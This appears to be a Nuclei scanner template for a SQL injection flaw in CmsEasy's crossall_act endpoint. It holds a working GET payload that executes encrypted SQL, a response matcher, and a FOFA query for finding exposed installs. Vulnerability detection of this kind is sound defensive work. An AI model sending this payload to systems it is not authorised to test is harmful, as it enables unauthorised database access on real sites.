nuclei-templates/http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml

32 lines
929 B
YAML
Executable File

id: cmseasy-crossall-sqli
info:
name: CmsEasy crossall_act - SQL Injection
author: SleepingBag945
severity: high
description: |
CmsEasy crossall_act.php SQL Injection Vulnerability. CmsEasy has a SQL injection vulnerability. Any SQL command can be executed by encrypting the SQL statement in the file service.php.
reference:
- https://cn-sec.com/archives/1580677.html
- https://github.com/GREENHAT7/pxplan/blob/e2fc04893ca95e177021ddf61cc2134ecc120a8e/goby_pocs/CmsEasy_crossall_act.php_SQL_injection_vulnerability.json#L28
metadata:
max-request: 1
verified: true
fofa-query: app="CmsEasy"
tags: cmseasy,sqli
http:
- method: GET
path:
- "{{BaseURL}}/?case=crossall&act=execsql&sql=WY8gzSfZwW9R5YvyK"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"123":"123"}'
- type: status
status:
- 200